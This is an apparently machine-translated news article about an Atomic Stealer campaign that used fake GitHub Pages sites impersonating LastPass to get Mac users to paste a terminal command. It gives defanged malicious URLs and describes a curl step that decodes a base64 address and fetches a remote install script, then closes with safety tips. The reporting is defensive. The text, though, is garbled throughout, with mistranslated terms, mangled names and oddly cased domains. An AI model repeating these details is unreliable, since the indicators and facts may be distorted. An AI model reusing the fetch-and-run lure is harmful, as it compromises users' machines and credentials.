- Atomic Stealer Malware installs silently via fake github — sides aimed at Mac users
- Attackers create multiple GITHUB accounts to bypass platform -Returns repeatedly
- Users who copy commands from non -verified sites risk severe system compro
CyberSecurity scientists warn Apple Mac users about a campaign using fake GitHub stocks to spread malware and infoTeals.
Research from LastPass Threat Intelligence, Mitigation and Escalation (Time) analysts who found that attackers imitate well -known businesses to convince people to download fake Mac software.
Two fake GitHub pages that took place to offer Lastpass for Mac were first spotted on September 16, 2025 under the username “ModHopmduck476.”
How the attack chain works
While these particular sides are taken down, the incident suggests a wider pattern that continues to develop.
The fake github -sides included links labeled “Install Lastpass on MacBook”, which redirected to Hxxps: // Ahoastock825[.]GitHub[.]IO/.GitHub/Lastpass.
From there users were sent to MacPrograms Pro[.]Com/Mac-Git-2-Download.html and asked to insert a command into their Mac’s terminal.
This command used a curl request to pick up a base64-coded URL decoded to Bonoud[.]Com/Get3/Install.sh.
The script then provided an “update” payload that installed Atomic Stealer (Amos Malware) in the temp library.
Atomic Stealer, which has been active since April 2023, is a well -known infoTealer used by financially motivated cybercrime groups.
Investigators have linked this campaign to many other false warehouses that mimic companies ranging from financial institutions to productivity apps.
The list of targeted names includes 1password, Robinhood, Citibank, Docker, Shopify, Basecamp and several others.
Attackers seem to create more GitHub users names to bypass the dismantles using search engine optimization to push their malicious links higher on Google and Bing search results.
This technique increases the chances of Mac users searching for legitimate downloads will first encounter the fake pages.
Lastpass says it “actively monitors this campaign” while working on dismantles and sharing indicators of compromise to help others detect threats.
Attackers’ use of GitHub pages reveals both the convenience and the risk of community platforms.
Swindling storage sites can be set quickly, and although GitHub can remove them, attackers often return under new aliases.
This cycle raises questions about how effectively such platforms can protect users.
How to remain safe
- Download only software from verified sources to avoid the risk of malware and ransomware.
- Avoid copying commands from unknown sites to prevent unauthorized code execution.
- Keep Makos and all installed software up to date to reduce vulnerabilities.
- Use the best antivirus or security software that includes ransomware protection to block threats.
- Enable regular system backups to recover files if ransomware or malware strikes.
- Get skeptical of unexpected links, emails and pop-ups to minimize exposure.
- Monitor official advisers from trusted suppliers for timely security updates and guidance.
- Configure strong, unique passwords and activate two-factor approval for important accounts.
